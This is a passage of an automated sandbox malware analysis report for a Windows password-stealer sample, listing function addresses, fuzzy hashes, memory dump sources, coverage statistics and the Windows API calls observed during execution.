Opcode Fuzzy Hash: 0f5a359249cf3f88f8ba14ddb8cce698c738af18f7e38d6d8fcdb9f6eeaa87f3
Instruction Fuzzy Hash: A911F2B59043498FCB20DF9AD584BDEFBF8EB48220F24841AD959A7250C374A949CFA5

Function 0129D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18df76e3ec5ff937d473e8ddfb086363929b453a9bb1ecbb6006dd09efd9af2
Instruction ID: 331bbc39ae59e3c2a4a36772172a126f0ccc2ead5ef8a8b85740fbe52ce21bc9
Opcode Fuzzy Hash: a18df76e3ec5ff937d473e8ddfb086363929b453a9bb1ecbb6006dd09efd9af2
Instruction Fuzzy Hash: 1F01D0714147859FFF244E5DDDC47EAFB98DF41224F18C45AEE090A246C3799440D671

Function 0596F7E8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e6102e2fde78bbd81703da3180b2aa067b3302aeb9a4e7f3614a6fb174a177b
Instruction ID: c2b149794ed280972ef22cb9cd3add4ee9e33277b8dbc40f0581bade9399a2bd
Opcode Fuzzy Hash: 7e6102e2fde78bbd81703da3180b2aa067b3302aeb9a4e7f3614a6fb174a177b
Instruction Fuzzy Hash: 0801FB39A08108DFC744DFA8D549AADBBFAEB49300F15D5D4E80A97366D734DE84DB40

Function 05968E78 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5700fc80c7605dd331cd89ba346fff8bcbb01490ba39279e8dcdfd5e939687a4
Instruction ID: ec2932b714fc48776498babcb193e616c866c5e893e6f1ff26dd5d56d6584bad
Opcode Fuzzy Hash: 5700fc80c7605dd331cd89ba346fff8bcbb01490ba39279e8dcdfd5e939687a4
Instruction Fuzzy Hash: 71010070900208DFDB15DF9AC5487DEBEF5FB88360F24C169E818AB290C7748984CB94

Function 0596F770 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f6ab27d47c14f8ccf8ad53b6ef0d6ef28054f841befc5b1cd548e9436319e8
Instruction ID: bad61eee5d5e687d9263020babff47cf14a65d6ee5474288449c10c64a979665
Opcode Fuzzy Hash: c7f6ab27d47c14f8ccf8ad53b6ef0d6ef28054f841befc5b1cd548e9436319e8
Instruction Fuzzy Hash: E9F0627490D208DBC704CF65E540ABDBBFEAF9E300F08E5A6D4095B21AD7309A48DF82

Function 05960251 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41dcfd7e318f3bde1857bb4326c1653c965597228ce1f0a78f30d5b455d3e587
Instruction ID: fb1bf7cf1a71764c1e7c46ea183093c7a249a7b1370c1db8f5409c71f9b11fb3
Opcode Fuzzy Hash: 41dcfd7e318f3bde1857bb4326c1653c965597228ce1f0a78f30d5b455d3e587
Instruction Fuzzy Hash: DA01AFB6904309DFDB10CF89D948BDEBBF1EB98320F148009E515A7220C3799959CFB1

Function 0129D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f85758b9b9a2ee410b4d3440114864559db7ac7aa5c449d7dfc991e015919b0
Instruction ID: 38e9fc89b8be0147a74d54b20a94191bbf6d7404f86b65a3a5c83e98924b3dfe
Opcode Fuzzy Hash: 4f85758b9b9a2ee410b4d3440114864559db7ac7aa5c449d7dfc991e015919b0
Instruction Fuzzy Hash: 4EF068754043449FEB248E19DD847A6FF98EF41724F18C45AED484F296C2799844DA71

Function 0596B350 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a697ba705a49327fb370858f3cc1a9f5a7f4ec97692d0f2ab0361c75ff86b7
Instruction ID: b705b15c48b981f5d04e42a5dc43975bfd43f7768ad46b75e8d822acd2961bf0
Opcode Fuzzy Hash: c8a697ba705a49327fb370858f3cc1a9f5a7f4ec97692d0f2ab0361c75ff86b7
Instruction Fuzzy Hash: E4F0DAB0E0430ADFDB54DFA9C945AAEBFF5FB48200F1049A9E918E7300EB7195048B91

Function 05968B90 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23d474709e4970b3e510694091d461f719d39c77f2313ef5d653e63712166f3
Instruction ID: 2eb52f5b2581d0b8c596e0e44721b82359c17eda70299d9c359c2ce8f66f42e6
Opcode Fuzzy Hash: e23d474709e4970b3e510694091d461f719d39c77f2313ef5d653e63712166f3
Instruction Fuzzy Hash: FFE0EC74E1121EEFCF04FFA5E9419AD7BB9FB45204B2086A8E80993305DB326E149B71

Function 0596B2F8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c574cf7a1420e0c51e5125bea670ca88473918d7fc70a54314067cbcf5975f78
Instruction ID: 8c82de5df8db9df91b2824d169d41738c107ea93362be1c54c93b02ed68f549f
Opcode Fuzzy Hash: c574cf7a1420e0c51e5125bea670ca88473918d7fc70a54314067cbcf5975f78
Instruction Fuzzy Hash: 98E0B6B0E4520ADFD740EFB9C905A5EBBF1FF08600F1189A9D019E7211EB749A058F91

Function 05969090 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction ID: 03be8aedca8fcf0b04da4ee015f52cbc310950018773c8f89c2f2271b565d3ec
Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction Fuzzy Hash: F0D05272C00138AB8B10AFE99C088EFFF78EF08A50B418122E915AB204D3720A20CBC1

Function 05969EF0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f908113aa6653083c2c54dec31de8e19f9c252d1a1e58d6510309a7d210133d4
Instruction ID: ac711f7ac685acb27c884bf527fdfa5d782bba75823b43b60d7d4d2f9973a913
Opcode Fuzzy Hash: f908113aa6653083c2c54dec31de8e19f9c252d1a1e58d6510309a7d210133d4
Instruction Fuzzy Hash: F7D0A972D0420CEFCB00DFA9D94049EBBF9DF4A100B1009EAC54AD7210FD319A0097E1

Function 0596B3F0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d518d19febaf6c21557e1a14265bcc74898ed462f460fa474f772ec103477279
Instruction ID: 9e08b1492e166d0b06a45587b8180aac6d46a8ad7f3d940bf461e0f11bc4cded
Opcode Fuzzy Hash: d518d19febaf6c21557e1a14265bcc74898ed462f460fa474f772ec103477279
Instruction Fuzzy Hash: 53D012362401085E4B40EFD4E844C6277DEBB64740B00C832E504C7121F621F438D751

Function 0596D100 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d134d1bf383602fd161c4790d78f188d7e24561c7205e50a41a5e404db753db
Instruction ID: 80bddd97a46bedff95a71d722fd9eaa8199e87b712fd1d14a9b5865c1d5c431d
Opcode Fuzzy Hash: 2d134d1bf383602fd161c4790d78f188d7e24561c7205e50a41a5e404db753db
Instruction Fuzzy Hash: 24C08C3006070C87D7542BA0FA0E3787FBC6706302F002020F00E800128FB41490CB65

Function 05968630 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd56d3110447cb232479df0575c2a09058443394e58841582238021b528d32d
Instruction ID: d7fe743b368c4dbefd055622e7cad2d4ac4b9c723c36ce62d636b55919cd79dd
Opcode Fuzzy Hash: cfd56d3110447cb232479df0575c2a09058443394e58841582238021b528d32d
Instruction Fuzzy Hash: B4B0127925C201B3940066608CD5F1F9091ABE6740BC5CC017205120008CF0587CE27F

Non-executed Functions

Function 059697E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0910a44352096d03c595385b20c0c3db5ba6344ea939391f2e249e8b865a658b
Instruction ID: 4db72d209b0831ad11a0ecdddb81f4746163b56cfff3c190afdea11647b54810
Opcode Fuzzy Hash: 0910a44352096d03c595385b20c0c3db5ba6344ea939391f2e249e8b865a658b
Instruction Fuzzy Hash: ABD1F335D2075A8ACB10EBA4D8906A9F771FF96200F50C7AAE10A77214EF706AC5CF91

Function 0144DE6C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68edf125607f285329af7a9bfed489e044150e7d1675bd15e95dfbba0b3dbfe6
Instruction ID: 670aa383b231283c57d4ff45780b92b2d4ebec33853851d5388f67acc671c907
Opcode Fuzzy Hash: 68edf125607f285329af7a9bfed489e044150e7d1675bd15e95dfbba0b3dbfe6
Instruction Fuzzy Hash: A9A18032E006068FDF15DFB9C4445EEBBB2FFA5300B25456AE905AB365DB31E916CB80

Analysis Process: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exePID: 8096, Parent PID: 7352COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	48
Total number of Limit Nodes:	4

Executed Functions

Function 064553A8 Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3729569647.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6450000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdb802fad1948c0cabd3d71e7df532abcad48349edcd666f0b39becab65402f
Instruction ID: 9cdf4261d79f71e688510adfe934b76d6ef200dc449c1ed7250958ad7e13c91c
Opcode Fuzzy Hash: 6cdb802fad1948c0cabd3d71e7df532abcad48349edcd666f0b39becab65402f
Instruction Fuzzy Hash: 1B412672E043558FCB14DFB9D4007EEBBF1AF89210F15856BD804A7352DB74A885CB90

Function 00A9AB68 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A9B05E,?,?,?,?,?), ref: 00A9B11F

Memory Dump Source

Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 36e78bc8b10982663fe27439328a930dd07757f73b7315bf5e74a378d1cbcade
Instruction ID: a970be3981d2e6b2f413d17632ec831559b6a6a89aca7067ff9020cca3987429
Opcode Fuzzy Hash: 36e78bc8b10982663fe27439328a930dd07757f73b7315bf5e74a378d1cbcade
Instruction Fuzzy Hash: 6B21E5B59003499FDB10CFAAD584AEEBBF4EB48310F14841AE914A7351D374A954CFA4

Function 00A9B090 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A9B05E,?,?,?,?,?), ref: 00A9B11F

Memory Dump Source

Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fce675aa13a59cf1e60b752ad8baa8ec7bbb04437729f3e5773a7f63bfb213bc
Instruction ID: 2c3351df82d9413f1f5f9450538afe492139f8e8ec023040ac2037d6d2dfd846
Opcode Fuzzy Hash: fce675aa13a59cf1e60b752ad8baa8ec7bbb04437729f3e5773a7f63bfb213bc
Instruction Fuzzy Hash: 832105B5900248AFDB10CF9AD984ADEFFF8FB48310F14841AE914A3250D374A940CFA0

Function 06454E32 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,064553FA), ref: 064554E7

Memory Dump Source

Source File: 0000000E.00000002.3729569647.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6450000_SecuriteInfo.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c94e3cf6d42a497a7ba24fded2a3030bcd879cc0bd49e758804e3047affc1d32
Instruction ID: 349e32e34da92c9dfa492680fc0c35c38961dec912d899e569265933c09341ce
Opcode Fuzzy Hash: c94e3cf6d42a497a7ba24fded2a3030bcd879cc0bd49e758804e3047affc1d32
Instruction Fuzzy Hash: DF2159B1C0425A9FDB14CF9AD4447EEFBF4AF09320F15812AD814A7242D378A955CFE2

Function 00A976A0 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00A97723

Memory Dump Source

Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 3b8641ca34c758f1330c4c8edb7b5112b1269df8707b9965954b7afacb7f1729
Instruction ID: 8089133d1c81576cea7fb50107348c35a7f91d1812a3f0f395b6cd0299f631c8
Opcode Fuzzy Hash: 3b8641ca34c758f1330c4c8edb7b5112b1269df8707b9965954b7afacb7f1729
Instruction Fuzzy Hash: DB2137B5D142098FCB14DF9AD844BEEBBF5FF88310F10882AD454A7250CB74A945CFA1

Function 00A976A8 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00A97723

Memory Dump Source

Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 68d69fc6b3f4ec378f6c1a974c0e7cf5aa1ae8995e4f96ff5ea15938ea457b26
Instruction ID: be93ff7eaf7bd0c16c4eab8b385db17151e1624e61189529bfb1ecb30159b184
Opcode Fuzzy Hash: 68d69fc6b3f4ec378f6c1a974c0e7cf5aa1ae8995e4f96ff5ea15938ea457b26
Instruction Fuzzy Hash: 632115B5D042098FDB14DFAAD844BEEBBF5FF88310F148429D455A7250CB74A944CFA1

Function 06454DCC Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,064553FA), ref: 064554E7

Memory Dump Source

Source File: 0000000E.00000002.3729569647.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6450000_SecuriteInfo.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 4a67f289f4a0190ffce1b4aff1f3571b028d6dcda9ce75086592aca8629b8302
Instruction ID: 693461d5d921622db329bab36027a7737b9449957ca39f8c761c243446fe1dc4
Opcode Fuzzy Hash: 4a67f289f4a0190ffce1b4aff1f3571b028d6dcda9ce75086592aca8629b8302
Instruction Fuzzy Hash: 821133B2C006599BCB24DF9AD444BEEFBF4AF49210F15812AE818A7241D378A950CFE5

Function 00A2D514 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720616471.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a2d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f780b133a56ba2d27f4b459637426fbb6201e221d49b250065fc801857c7cc
Instruction ID: b8e63bc47e5754fa3820833b0d7baca68c015be9defa68ec1dcd26217fcfea0c
Opcode Fuzzy Hash: e6f780b133a56ba2d27f4b459637426fbb6201e221d49b250065fc801857c7cc
Instruction Fuzzy Hash: 402106B1504240DFDB15DF18E9C0B26BB65FB84318F24C579E9090B257C376D856CAA2

Function 00A3D2B4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd4466a5deaedccab1d6008454852a2153016aa870de84fb3a91e463f5aa070
Instruction ID: 86733c6293f34006af4c19947ed04f6a449ca0ab13df8bd8fcf551e3211481a7
Opcode Fuzzy Hash: 9cd4466a5deaedccab1d6008454852a2153016aa870de84fb3a91e463f5aa070
Instruction Fuzzy Hash: 7521C2B5504244EFDB05DF14E5C0B26BBA5FB84314F24C56DE84A4F256C37ADC4ACA62

Function 00A3D0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c23ae75ebd36237d66ee1536787ba405f82218bb7187b7ed06dbb7a23f024f3
Instruction ID: d25a0a6f64fd9b399fe79458545a98f33c80fde1c364a0fe1f585e56da0016cb
Opcode Fuzzy Hash: 0c23ae75ebd36237d66ee1536787ba405f82218bb7187b7ed06dbb7a23f024f3
Instruction Fuzzy Hash: 5021D4B5504344EFDB05DF14E9C0B26BBB5FB88314F24C66DE80A4B296C37BD846CA61

Function 00A3D01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d540d67aa08a3617e17c52b80ef06764d74c9c618d212a449206c00e287afe
Instruction ID: 51499c9a00df036928dffe077014ad296bcafe7d2f0bdc7e4c665d5403d9e406
Opcode Fuzzy Hash: 25d540d67aa08a3617e17c52b80ef06764d74c9c618d212a449206c00e287afe
Instruction Fuzzy Hash: 08210471604300DFDB18DF20E5C0B26BBA5EB85B14F24C56DE90A4B256C376D847CA62

Function 00A2D50F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720616471.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a2d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: b701eea98a7ee8bc6669fdef0eb6c59157f3d4d1fcf05c97588ff37a9ba3091f
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 66110376404280CFCB12CF04D5C0B16BF72FB94318F24C1A9D8094B657C33AD856CBA1

Function 00A3D0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: cb443226483573549c0576660fc977e742d4b1e38ec72d3f9c2cf344d5777e1b
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 50119D75504284DFDB16CF10E9C4B15BBB1FB84314F28C6AAEC494B656C33AD85ACBA1

Function 00A3D2AF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 6e7ad50824ce6b9a66c39c67fd483227152dd0729ccc47988867961ecf14d203
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 1D119079504640DFDB16CF10D5C4B15BB71FB44314F28C6A9E8494F656C33AD84ACF52

Function 00A3D017 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25e9645a5cf3391dfb228d20f9a1865fdab39c41954a6832f54ea582c9d7377
Instruction ID: db26c11cb911e037c6366cf63273b947617a59486e5dcd4a48c46b238ccabcbb
Opcode Fuzzy Hash: e25e9645a5cf3391dfb228d20f9a1865fdab39c41954a6832f54ea582c9d7377
Instruction Fuzzy Hash: 5511BF75504280CFDB16CF20E5C4B15BFB1FB85718F24C6ADE84A4B666C33AD84ACB92

Analysis Process: pNYyTm.exePID: 8164, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	229
Total number of Limit Nodes:	10

Executed Functions

Function 06444134 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06444376

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3fe29bc9afc4776e5aa28d1dc2f93d7fe976ccd607282873753d4c3d49e21152
Instruction ID: 1399f4ffd4c1408c0acb64a7396829890f4c169409d205adf67147b397b5fc9f
Opcode Fuzzy Hash: 3fe29bc9afc4776e5aa28d1dc2f93d7fe976ccd607282873753d4c3d49e21152
Instruction Fuzzy Hash: 01A16971D006198FEB61DFA8C841BEEBBF2FF48310F15856AD808A7240DB749985CF91

Function 06444140 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06444376

Memory Dump Source

Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4e610610b68d2c3bd8674471f3a042c9a79c56bb2facfc22a73f1f990a704bf9
Instruction ID: 9581a77b159dd1f7a6422486b53211220a8e6d5548e405b7e13b24e4f39c67d7
Opcode Fuzzy Hash: 4e610610b68d2c3bd8674471f3a042c9a79c56bb2facfc22a73f1f990a704bf9
Instruction Fuzzy Hash: CA916A71D006198FEB61DFA8C842BEEBBF2FF48310F15856AD809A7240DB749985CF91

Function 019CB068 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 019CB2BE

Memory Dump Source

Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1b5a92116b1b78907e4ff340ef599189e7f708e7488152256c340f6ddd59a58d
Instruction ID: 8c025901ffbc178feca4b1833e377dfa9286d0c52c0f243018b2efe8a5aa2410
Opcode Fuzzy Hash: 1b5a92116b1b78907e4ff340ef599189e7f708e7488152256c340f6ddd59a58d
Instruction Fuzzy Hash: 4C716570A00B058FEB24CF69D44575ABBF5FF88640F008A2DD48AD7A40E774E945CF92

Function 019C44C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

